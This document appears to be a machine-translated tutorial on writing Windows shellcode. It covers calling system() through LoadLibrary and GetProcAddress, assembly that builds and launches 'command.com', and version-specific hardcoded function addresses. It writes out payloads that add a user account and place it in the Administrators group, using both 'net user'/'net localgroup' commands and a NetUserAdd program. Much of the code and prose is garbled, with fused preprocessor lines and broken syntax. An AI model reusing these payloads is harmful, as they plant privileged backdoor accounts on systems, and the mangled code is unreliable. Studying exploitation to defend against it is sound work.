Second, under Windows ShellCode writing preliminary

Chapter II, under Windows ShellCode writing Preliminary (a) ShellCode

Definition: The first Shell refers to the human-computer interface, ShellCode is a set of machine code that can accomplish the function we want, usually in the form of a hexadecimal array
NOTES: Each time the computer executes only the instruction (single CPU) that the current EIP points to. After the current instruction is executed, the EIP automatically adds 1 to the next instruction. If there is a JMP call RET type of instruction, the EIP will be forcibly changed to the specified address, thus completing the process of the jump

(ii) Open the console window of the C program

Upgrade version:

Program Explanation:
(1) typedef void (*MYPROC) (LPTSTR)
Defines a function pointer whose argument to the function is a string and the return value is empty. The purpose of this pointer is to point to the system function, which is called after it, and is equivalent to calling the system function
(2) Libhandle = LoadLibrary ("Msvcrt.dll")
Load Msvcrt.dll This dynamic link library, the handle of the dynamic link library is assigned to Libhandle
(3) Procadd = (MYPROC) GetProcAddress (Libhandle, "system");
After obtaining the handle to the dynamic link library, we then use "GetProcAddress (Libhandle, System)" To get the real address of the system. Then use this real address to invoke the system function. After executing the statement, Procadd is a pointer to the system function (not an address (*)), that is, the address of the system function that Procadd is stored in
(4) (Procadd) ("Command.com");
Because the procadd at this point is a pointer to the system function, "(Procadd) (" Command.com ") is called" System ("Command.com") "To complete the function we want

(iii) View the address of the function

Look at the address of the system function: under VC press F10 to enter the debug state, and then in the Debug toolbar, click the last button ' disassemble ' and the fourth button ' registers ', so there is the source Code and Register Status window
Press F10 and the program will step
The value of EAX is the address of msvcrt.dll (' Libhandle = LoadLibrary ("Msvcrt.dll") ' Call DWORD ptr [[Email protected]4 (0042413c)] is executed ' LoadLibrary ("Msvcrt.dll") ', the return value is the address of the Msvcrt.dll, and the return value of the function is usually placed in the EAX.

Four The principle of function invocation under Windows

1. Under Windows, a function call needs to Load the dynamic link library where the function is located, as we all know. Instead, the arguments are passed with the stack at execution time, and then the address of the function is directly call.
   2.notes:linux, the function is executed using a system interrupt call. The system calls the system call code of the function to EAX (for example, Execve is 0xb), the function takes the parameter to other registers, finally executes the int$0x80 interrupt instruction, completes the function execution
   3. Example: Execute function Func under Windows (ARGV1, Argv2, Argv3), first put the parameters from right to left into the stack, here is the Argv3, Argv2, argv1 into the stack, then call the address of the Func function, here the call Fu nc
   function address, is actually equal to two steps, one is to save the current EIP, and the second is to jump to the address of the Func function execution, that is, Push EIP + Jmp Func
   

(v) Assembly and machine code--Real ShellCode generation

1. Write the assembly code for System ("Command.exe")
I do not know the address of the Command.exe string, so I construct it, put ' Command.exe ' a character of one character pressed into the stack

The ESP is exactly the address of the Command.exe string, and then push the ESP

Note:1. The computer stacks up to four bytes, so we PUSH four bytes at a time, or we'll just one byte a word
The value is assigned to the stack without PUSH, and is directly assigned, as follows:

MOV esp,ebp;
MOV ebp,esp; Assign the current ESP to EBP as the bottom of the stack
XOR Edi,edi;
Push EDI; press into 0,esp-4,; The function is to construct the end of the string.
Sub esp,08h; plus above, a total of 12 bytes, used to put "command.com".
mov byte ptr [ebp-0ch],63h; C
mov byte ptr [ebp-0bh],6fh; O
mov byte ptr [EBP-0AH],6DH; M
mov byte ptr [EBP-09H],6DH; M
mov byte ptr [ebp-08h],61h; A
mov byte ptr [Ebp-07h],6eh; N
mov byte ptr [ebp-06h],64h; D
mov byte ptr [Ebp-05h],2eh;.
mov byte ptr [ebp-04h],63h; C
mov byte ptr [ebp-03h],6fh; O
mov byte ptr [EBP-02H],6DH; M one-by-one generates the string "Command.com".
Lea Eax,[ebp-0ch];
push eax; Command.com string address as a parameter in the stack
mov eax, 0x7801afc3;
call eax; Address of the call system function

(1) ' Push EDI ' and ' Sub esp,08h ' are the ESP minus 12 bytes, this 12 byte space is used to put (2) Command.com '; (2) ' mov byte ptr [ebp-0ch],63h ' etc, is we put Command.com A byte is placed in a space that is left out;
(3) ' Lea Eax,[ebp-0ch] ' to obtain the address of the constructed Command.com string;
(4) ' push eax ' puts the address onto the stack, and the address of the call system function is completed.

Six Preliminary analysis on the general nature of ShellCode

Because the system version is different, the address of the LoadLibrary and the system function differs

NOTES: Program GetAddr.cpp for automatically locating function addresses:

include <windows.h>include <stdio.h>

typedef void (*MYPROC) (LPTSTR);
int main ()
{
HINSTANCE Libhandle;
MYPROC Procadd;
Libhandle = LoadLibrary ("MSVCRT");
printf ("Msvcrt libhandle =//x%x\n", libhandle);
Procadd= (MYPROC) GetProcAddress (Libhandle, "system");
printf ("system =//x%x\n", procadd);
return 0;
}

NOTES:
The LoadLibrary function in Kernel32.dll
The MessageBox function in User32.dll

1. Pop Up the Windows dialog box ShellCode writing

include "Windows.h"

int main (int argc, char* argv[])
{
LoadLibrary ("user32.dll");
MessageBox (0, "ww0830", "ww", 1);
return 0;
}

2. Add user ShellCode to write
1. (1) Add Users: NET user Name/add
(2) account added to Administrator: DOS command line execution net localgroup administrators Name/add

include <windows.h>

int main ()
{
LoadLibrary ("Msvcrt.dll");
System ("NET user C/add");
System ("net localgroup Administrators C/add");
return 0;
}

2. Another way to add a user
With the NetUserAdd and Netlocalgroupaddmembers functions in Netapi32.dll.
NOTES:
(1) ASCII encoding uses a byte to represent a character, so there are only 256 combinations of
Unicode is a two-byte (16-bit) representation of a character, so that there are 65536 combinations of

ifndef UNICODE

Define Unicodeendifinclude <stdio.h>include <windows.h>include <lm.h>pragma comment (lib, "netapi32 ")

int wmain ()
{
User_info_1 UI;
DWORD dwerror = 0;
Ui.usri1_name = L "ww0830";
Ui.usri1_password = L "ww0830";
Ui.usri1_priv = User_priv_user;
Ui.usri1_home_dir = NULL;
Ui.usri1_comment = NULL;
Ui.usri1_flags = Uf_script;
Ui.usri1_script_path = NULL;
//Add a user named ww0830 with a password of ww0830
if (NetUserAdd (NULL, 1, (LPBYTE) &ui, &dwerror) = = nerr_success)
{
// Added success
printf ("Add User success.\n");
}
Else
{
//Add failed
printf ("Add User error!\n");
return 1;
}
wchar_t szaccountname[100]={0};
wcscpy (szaccountname,l "ww0830");
Localgroup_members_info_3 account;
Account.lgrmi3_domainandname=szaccountname;
//Add ww0830 to Administrators Group
if (netlocalgroupaddmembers (null,l "Administrators", 3, (LPBYTE) &account,1) = =
Nerr_success)
{
//Add succeeded
printf ("Add to Administrators success.\n");
return 0;
}
Else
{
//Add failed
printf ("Add to Administrators fail!\n");
return 1;
}
}

NOTES:
1. Find the address of the LoadLibraryA function is the address of the 0x77e6a254,system function is 0x78019b4a, is correct, but why I changed ShellCode corresponding to the place "\x77\xe6\xa2\x54" and "\x78\ X01\X9B\X4A "Cannot eject the DOS window?
Be careful not to reverse the order of bytes, it should be "\x54\xa2\xe6\x77" and "\x4a\x9b\x01\x78".
2. Under Windows systems, the rules for multi-byte storage are: The number of high places on the memory address, the number of the low place in memory. For 0x77e6a25478, 0x77 is the highest, so put the high address in memory, and in the string, in the memory from low to high, so to put 0x77 in the end of the string.
The addresses of the 3.LoadLibraryA and system functions are 0x77e78023 and 0x7801aaad under Win2000 SP0, respectively SP2 and 0x77e6a254 under 0X78019B4A, SP3 under 0x77 respectively E69f64 and 0X7801AFC3; under XP SP0 are 0x77e605d8 and 0x77bf8044 respectively.

1. Why does the LoadLibrary function have two implementations of LoadLibraryA and LOADLIBRARYW in the system? And the system has only one?
   Under Windows, there are several programming interfaces.

(1) Windows API functions. This type of function is related to Windows systems and is used only for data types (such as CHAR) that are unique to Windows. There are two implementations of the API function, a and W, and LoadLibrary is the API function.
(2) C runs the link library, is implemented according to the C language standard, so only lowercase letters, and only one implementation, such as system
function (in the C language standard, the specified function name is lowercase)
The identifiers of 5.Windows applications are usually "case" mixed, such as addchild; under Windows It is recommended to use the "Hungarian" naming convention, where class names and function names are combined with words starting with uppercase letters, and variables and arguments are combined with words that begin with lowercase letters, and the constants are all capitalized , the global variable is prefixed with "G", and the data member of the class is prefixed with "m_"
The identifier for a UNIX application is "underlined" in a "lowercase" manner, such as Add_child

1. ShellCode cannot have 0x00, because 0x00 is a string of terminator

Second, under Windows ShellCode writing preliminary